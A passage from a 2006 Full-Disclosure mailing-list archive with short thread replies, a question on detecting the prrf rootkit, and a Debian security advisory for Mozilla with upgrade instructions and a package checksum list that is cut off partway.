> From michaelslists at gmail.com Sun Dec 3 09:27:31 2006 From: michaelslists at gmail.com (mikeiscool) Date: Sun, 3 Dec 2006 20:27:31 +1100 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <45726DC9.5060200@gatech.edu> Message-ID: <5e01c29a0612030127o50c20c6fkf3c1e568e14daa8@mail.gmail.com> On 12/3/06, Dude VanWinkle wrote: > On 12/3/06, Matthew Flaschen wrote: > > Or, realize that no one lost money in 9/11, even those who had banks in > > the World Trade Center. Why? Every bank has multiple redundant > > backups, including offsite storage. > > > > hey, you are from gatech...you should know not to use absolutes like > "no one lost money in 9/11", especially on a mailing list with: ferg, > brian, drsolly, JP, the Randall's, Grandpa, etc, etc; that is run by > Gadi! I think your thinking of another list, we're on fd now .... From dudevanwinkle at gmail.com Sun Dec 3 09:39:11 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Sun, 3 Dec 2006 04:39:11 -0500 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <5e01c29a0612030127o50c20c6fkf3c1e568e14daa8@mail.gmail.com> References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <45726DC9.5060200@gatech.edu> <5e01c29a0612030127o50c20c6fkf3c1e568e14daa8@mail.gmail.com> Message-ID: On 12/3/06, mikeiscool wrote: > On 12/3/06, Dude VanWinkle wrote: > > On 12/3/06, Matthew Flaschen wrote: > > > Or, realize that no one lost money in 9/11, even those who had banks in > > > the World Trade Center. Why? Every bank has multiple redundant > > > backups, including offsite storage. > > > > > > > hey, you are from gatech...you should know not to use absolutes like > > "no one lost money in 9/11", especially on a mailing list with: ferg, > > brian, drsolly, JP, the Randall's, Grandpa, etc, etc; that is run by > > Gadi! > > I think your thinking of another list, we're on fd now .... whoops! gmail combines these conversations when ppl cross post, sorry! My earlier statement goes quadrillion-fold for FD! -JP From ozan at cryptos.net Sun Dec 3 12:06:28 2006 From: ozan at cryptos.net (Ozan Ozkara) Date: Sun, 03 Dec 2006 14:06:28 +0200 Subject: [Full-disclosure] 802.1X tool? In-Reply-To: <45708D89.2030407@csuohio.edu> References: <1165001851.5566.25.camel@prophecy> <45708D89.2030407@csuohio.edu> Message-ID: <1165147588.9311.1.camel@prophecy> thanks to everyone who have responded my question. -ozan On Fri, 2006-12-01 at 15:16 -0500, Michael Holstein wrote: > Meetinghouse (AEGIS) or Funk (Odyssey). > > Note : Meetinghouse is now owned by Cisco. > > Cheers, > > ~Mike. > > > Ozan Ozkara wrote: > > Hi folks, > > > > I am trying to find a tool which provides automatic client configuration > > for 802.1X implementation in windows environment. I'm trying to > > implement 802.1x authentication for > > both wired and wireless connection. Is there any way to do remote client > > configuration tool for win32 environment. Will i be able to do that? > > > > I'd appreciate any real world experience on the subject. > > > > thanks > > > > > > > > > > ------------------------------------------------------------------------ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061203/7e150074/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061203/7e150074/attachment.bin From jinsan07 at gmail.com Sun Dec 3 13:23:05 2006 From: jinsan07 at gmail.com (Jin San) Date: Sun, 3 Dec 2006 22:23:05 +0900 Subject: [Full-disclosure] Detect prrf rootkit Message-ID: Hi, Anybody could tell me which tool can be used to detect prrf rootkit (Phrack 58)? Of course the vanilla prrf is easy to detect, as they did not try to hide the kernel module. But suppose that somebody modifies the code, and succesfully hide the LKM (I know there are some good ways to do that), how can we detect prrf? As far as I know, only EPA (Phrack 59) tool is able to detect prrf. However, EPA does not work very reliably. This rootkit is pretty old, but it seems there is no good method to detect it? Thanks, Jin From joey at infodrom.org Sun Dec 3 15:30:39 2006 From: joey at infodrom.org (Martin Schulze) Date: Sun, 3 Dec 2006 16:30:39 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1224-1] New Mozilla packages fix several vulnerabilities Message-ID: <20061203153040.06E97FDE1@finlandia.home.infodrom.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1224-1 security at debian.org http://www.debian.org/security/ Martin Schulze December 3rd, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : mozilla Vulnerability : several Problem type : remote Debian-specific: no CVE IDs : CVE-2006-4310 CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 CVE-2006-5748 CERT advisories: VU#335392 VU#390480 VU#495288 VU#714496 BugTraq IDs : 19678 20957 Several security related problems have been discovered in Mozilla and derived products. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-4310 Tomas Kempinsky discovered that malformed FTP server responses could lead to denial of service. CVE-2006-5462 Ulrich K?hn discovered that the correction for a cryptographic flaw in the handling of PKCS-1 certificates was incomplete, which allows the forgery of certificates. CVE-2006-5463 "shutdown" discovered that modification of JavaScript objects during execution could lead to the execution of arbitrary JavaScript bytecode. CVE-2006-5464 Jesse Ruderman and Martijn Wargers discovered several crashes in the layout engine, which might also allow execution of arbitrary code. CVE-2006-5748 Igor Bukanov and Jesse Ruderman discovered several crashes in the JavaScript engine, which might allow execution of arbitrary code. This update also adresses several crashes, which could be triggered by malicious websites and fixes a regression introduced in the previous Mozilla update. For the stable distribution (sarge) these problems have been fixed in version 1.7.8-1sarge8. We recommend that you upgrade your mozilla package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8.dsc Size/MD5 checksum: 1124 a6f4c7ddbcb0d9126d4e0a81fda4059a http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8.diff.gz Size/MD5 checksum: 574770 77a056d9582389d1a31de1136dd7a0a2 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8.orig.tar.gz Size/MD5 checksum: 30589520 13c0f0331617748426679e8f2e9f537a Alpha architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 168064 33104218442c9bd7b113df794afdefe0 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 148564 be8d4aeb7da1d0a7e7524096cefee038 http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 184948 f831a7dd089c599c695ab540720be912 http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 858396 bd636d8d59d54016d4051ae37fbf0455 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 1034 bb3c11032fe99445e2831485155f9bec http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 11494648 a1029b5935bf687048b0a8156fb3910c http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 403290 ade408aef33a53453263a2a83cf96524 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 158332 ccdc52d9b79b5359e18ef4f8e39ae068 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 3358886 c86ce3ccec680c80730cf046560d1cc8 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 122288 91187d98388e73f4ca5aa93314a23d78 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 204152 405074b924c7ec7450da6cc623a2d6f9 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 1937184 a527be2c3bb0991c25b1388b17f36509 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_alpha.deb Size/MD5 checksum: 212628 6c21078c7b3676273f1224c7028e4f63 AMD64 architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 168068 44912cded148a15690602d83b05517c4 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 147682 56dd565ea350862e6c512562929d6beb http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 184956 1f2c8bb99907df91c3d0f7800d77461d http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 716604 df8853c93a3f8688efc458929802087a http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 1036 2691304128a390fa0d0ddd06e5c014fd http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 10958880 c7c04de71bd68b738f13c187a88b4ab1 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 403272 6f5cba2fcd9f28e58e1a46ce9fe2034d http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 158328 ffd9e0136af049212c7668080b1590ba http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 3352912 accc3e9736aa0758d131cdf459e2be49 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 121194 cbf6ac02a99d7fb7a64cc29b07433c82 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 204156 ed48ca294a99e3e18eed491119c0d5ea http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 1936052 c051bd4fe32d5d0225f3eae41b01af61 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_amd64.deb Size/MD5 checksum: 204454 e52b74e973244cdc91030148777b2607 ARM architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 168078 056a33d7d2c0d1ddec9dc82bc10fa91b http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 126062 279c0b2b4672b68c99414f2864d48c8e http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 184962 d3b634a995bcb30e328c4bc23db47742 http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 633928 2021be577fc4731afad9fb85f10b900e http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 1036 a6a62863932baa16457b8957f191dc8c http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 9221058 38cf4492787382ca6f092f8b8996c29d http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 403328 db6d998bf24a01bc40e8958c18b8354a http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 158342 5851791133fe390520c0dc627cf0e5bb http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 3342584 471aee590010373272675eb6dc51bf9b http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 112668 3a2b8d1d473e4801a0e90f0e6e20d173 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 204162 6679a330049947996fd1649ee9015238 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 1604480 9ce39476d103f3d42cb500853c5f24d8 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_arm.deb Size/MD5 checksum: 169002 02c81d7993667ef81be7c602681e96f0 HP Precision architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 168076 906aae615cfccc867128dfe39ac510bc http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 158584 e4d74474057887b6cb2852f4e4b01c74 http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 184956 5551d423e4375da8fb4f9c16dd6a3f3b http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 756664 d2a92775acd425551d1804c23eae7bdf http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 1038 7e88d25552135eb7f79a2fd2c6bd2b22 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 12177466 14304d3394a221c2aa7bc531af9b591b http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 403286 f98a9ce0ae8980625c282f80523f0bc7 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 158338 c384d2a4f962d0b9820a5ba28cd1218c http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 3359316 77e7f6cfee145742ae2e13f24ec27def http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 123522 69dbc3a82863990e7ca431b7f6a29b61 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 204160 34b097e3f1e4a08af78541d3a12271e7 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 2135234 33d7b6fbf3a170104167b5403fc3f794 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_hppa.deb Size/MD5 checksum: 216448 fb8e5b76a683c26e1c3ced60acbb23b2 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 168078 fead516428ff54afba8fb9ffeb6107b7 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 138378 89380d80fe8f7e985a9307a9a677bc3e http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 184968 0abd8dfb25de28cb50c5e58648a0ff3a http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 662194 a2f137e0d9c3c8a936a7ef1393de2955 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 1036 fd2f5c0d987df8a32ab9818ff0a2d968 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 10315404 db2f25cbb471e5387de1aeef7e176f7e http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 403286 b3bf4d34d9a51f3f1708b06c70901cf3 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 158358 fde8eec72729840210de689b2a343a51 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 3348734 081bfa3f5e9b81894f5a147ec05298ab http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 116236 5bb8e35c9cf6bcf73572e1307d4e036f http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 204172 bb709199707869539300ae4ace073983 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 1811294 790f8577dc06fc90034945919a949ac7 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_i386.deb Size/MD5 checksum: 192634 592adc759e44972dacdc85ebe1296a63 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 168060 3ee0a67cfc308f6d7b0f9343a63f02fb http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 176012 62b50ac23c369004b18620238da294dd http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 184936 443ef5c72a5fd2b92028468433fdc2da http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 968864 f4e5406c1a7abe968b52cccfd4ba3041 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 1032 682087a412c08bbc251fe22e56a0dd6d http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 12966514 05ed823dbd6c55fd456f03f63aefb7e3 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 403270 03b53aaf2cd12b98d1e3f6f8a8d7dbea http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 158318 ee4f77127d14a091d8730fbcb7cab219 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 3378656 76bc26292ee2482e3b7f18b807357898 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 125584 372e14fa5d4a23a4df7f4b393f66bc3a http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 204148 030a13e33c394393c22cbbe03a5fd7b7 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 2302326 2045f4c0ded45041ede24f2fe8316f25 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_ia64.deb Size/MD5 checksum: 242940 92b1755ece7f86361e2467ecbe8a0b98 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 168086 d72a577c1f74c1e64183625c6afbb356 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 127678 38a811b392550848806b4ea82b3786d9 http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 184978 37b8d8c26f1e913bcc0676351655fbd9 http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 601900 70ae4f03be4fb2a05589149a565184f4 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 1044 843ae71e0612517ec6d037f0157bcc6a http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 9716824 1976d754f162f52fada5c6ae709a63df http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 403350 9299ef454121636429cd58ce4648de74 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 158384 8f5d9c08ce9ee22a7a523ab12d0339a1 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 3337078 7c2763fc5d1399ba0f6de5e60c487a9f http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 114460 847321a189d09a37590931b7bdaa12b8 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 204188 0acd1202b74153c09e96dc03c82f858c http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 1683182 6fce1b70bc59f24fcaf9204ed8045a0e http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_m68k.deb Size/MD5 checksum: 175004 ba9f9d625b54cb3b8338f353eb591d63 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 168066 40951a292610d572fb32bc9a08e3d716 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 142540 467f786d8c69106d6bf52c4ff0f147df http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 184948 90d54a6da32f70c55e562ba0908bb615 http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 727612 bef2fa46727d30564df686f3bec97b4c http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 1036 3f24cf20cf983e887def6ab4e83d313f http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 10739450 81c0c801442b91873e351e6469cd626d http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 403256 7dea9f93c79476d6c4a08e7da9749d71 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 158328 6ff36aad6504f5156e2cdc4e4e6990fa http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 3358884 7dc0ffad84ddf4ff45ed019f856ddde8 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 117622 63931cee65d76f9c7810110fffd591b7 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 204148 64b3b20a437d605742e300d41cdbf251 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 1795510 92e0f045d8bf37b1ea6d90e84480d40c http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_mips.deb Size/MD5 checksum: 190118 debdc2467236eec1f5ca49bc8ddac2c9 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 168074 cf9f50671782c08500d3c2d29f93ef9e http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 142492 b7b2127fa138bd01dc1c7b4fb4dc1638 http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 184942 4a26b1d61ac0daf627f2e7cb8797db82 http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 717068 0b935bf6dca82a129f2c678b6069b928 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 1040 69af0bb34af5f881b501bd829b4364bf http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 10620284 93085f80cc02f554bf3d7e1e0d39c176 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 403274 526ced11500a8d0c08044786255199df http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 158340 7b6d7ee717b0bf427bbb469b05908f38 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 3359422 a710eb88d086ddd2f41f1c0f9a1582c6 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 117206 6f80a50306eb573deaa8052ef7b953c4 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 204160 182f59bc3a66185d5d99f4f4b892bf0d http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 1777592 0bef8a8191417e642e11a87b95cbff28 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_mipsel.deb Size/MD5 checksum: 187610 15e1ba2286e45ea4de8bd10e1043b4ae PowerPC architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 168068 4afc44e689523284f6596c49a0c57c04 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 132968 c7f1bc15d01ace3a8544dd8ac09c4f5f http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 184954 69dd645183560089b4f0b079b14ff7ba http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 720814 b919244b4647539e92ac8496175e5ec9 http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 1030 c93abd84beb9d1b5df1f393dcb742e4d http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 9712666 01692a2bb19b64406bcdecdf43fd6921 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 403274 c84c30bab18ab3337cf7c995f1bd235e http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 158332 e356212dd93e1bd4762f0350461bc0d8 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 3341184 51eac899e26a44b28ca9304f7de58bad http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 114586 582bec3e96ed89fb2b66d127135c2d99 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 204154 cfcef824bc6d730f8749e92626377512 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 1643132 05d2aae54574a7440b11e3d1683b4491 http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_powerpc.deb Size/MD5 checksum: 175800 b9c2d4010924375ae96697b5c85a2886 IBM S/390 architecture: http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 168068 49233d2e9ce43df4702d355bbe0a1405 http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_s390.deb Size/MD5 checksum: 